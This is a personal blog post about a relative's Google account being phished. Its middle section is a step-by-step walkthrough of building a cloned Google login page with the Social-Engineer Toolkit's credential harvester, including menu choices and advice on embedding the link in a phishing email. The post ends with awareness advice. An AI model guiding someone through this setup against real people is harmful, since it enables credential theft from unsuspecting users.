I never realized how easy it was to get a username and password to an email account until my mother was hacked. Listening to her explain what happened I realized that the attack was simple enough… she logged into to her google account through an email asking her to confirm her username and password. Why would she question the request?
When I got access to her laptop I suspected the attack on her credentials was much larger and had migrated into her computer. She told me of unauthorized Amazon purchases while I watched random popup messages appear on her laptop. I closed her computer, told her to never log into it again, bought her an iPad, and changed all her passwords. Then we had a long talk about malicious links and random support people calling her up to ‘help’ her.
I tried to understand how she got to this point of compromised accounts and discovered that it's pretty simple.
Email Phishing Attack
Phishing is a type of online scam where criminals impersonate legitimate organizations via email, text messages, or advertisements to steal usernames and passwords. This happens by including a link that will appear to take you to the company’s website to fill in your information — but the website is a clever fake and the information you provide goes straight to the hackers behind the scam.
It went down something like this:
- The attacker sent a phishing email to my mother. In this case, a carefully worded document to click on a link that will log her into their Google.com account. If she didn’t respond immediately, she would be locked out of her account.
- My mother clicked the link and arrived at a web page that looks identical to a Google.com login page.
- She logged into the fake Google.com site. She sees normal Google pages and believes she successfully logged into Google.com and prevented her account from being locked.
- The username/password information is sent to the hacker who collects the credential data and moves to the next stage of the attack.
A carefully crafted phishing email lacking typos or bizarre grammar is important to the success of the phishing campaign. The email she received was similar to this one with the subject line: Verify Your Google Account.
This particular method uses two common social engineering tools used by maliscious actors: trust and urgency.
Ironically a couple of days after I sent this test phishing email to myself, I saw it sitting in my inbox and opened it forgetting that I had crafted this alert for this article. Its easy to be fooled if you are distracted!
How a Hacker Stole My Mother’s Login Information
We are going to use Kali Linux for this walkthough, but there are several tools available for credential harvesting. This attack is amazingly simple, I’m surprised it is so easy to implement.
- From the command line launch the Social Engineering Toolkit (SET) as root.
The Social-Engineer Toolkit is a set of tools provided by trustedsec.com for penetration testing and ethical hacking.
- From the main menu, select Option 1, Social Engineering Attacks.
From the Social-Engineering Attacks menu select Option 2, Website Attack Vectors.
- From the Social-Engineering Attacks submenu, Select Option 2, Website Attack Vectors.
From the Website Attack Vectors menu, Select Option 3, Credential Harvester Attack Method. Using built-in templates, this option allows us to use popular websites, such as Google, Yahoo, Twitter, and Facebook.
For the Credential Harvester Attack method, Select Option 1, Web Templates
The Credential Harvester starts to build the collection site. If you are using the same machine to collect your information, use the default IP address for the POST back in Harvester/Tabnapping [192.168.1.183]: selection. Change this address to your machine.
From the list of Web Templates, Select Option 2. Google.
The Social Engineer Toolkit — Credential Harvester Attack builds a temporary website by cloning a copy of google.com. It will start a webserver at the address you specified and starts a listener on Port 80. Any connections to this port are logged to the console.
You can test this exploit by pointing your browser to the IP address you supplied in the Harvester/Tabnapping section or by embedding this link into your carefully-crafted phishing email.
The exploit is complete. All the hacker needs to do is wait for somebody to load the page.
Casual users won’t notice the unconventional URL and Not Secure lock highlighed in red in the web brower’s location bar.
Successful Credential Capture
Meanwhile, the attacker waits for the following message.
Completing the fake Google Account login page captures the credentials and sends them to the console of the attacker’s computer. In our example, a possible username is email@example.com while her password appears to be Ilikecats.
A little bit of trust and a believable story is all that is needed to harvest some credentials. Imagine launching this attack against several thousand email addresses?
How to Protect Mom
There is nothing new in preventing this type of attack. Regular everyday security practices apply: do not click on links from somebody you do not trust. If you feel the need to click the link, confirm the URL is from the same trusted source, there are no typos and that it is not from an IP address.
She loves her new iPad.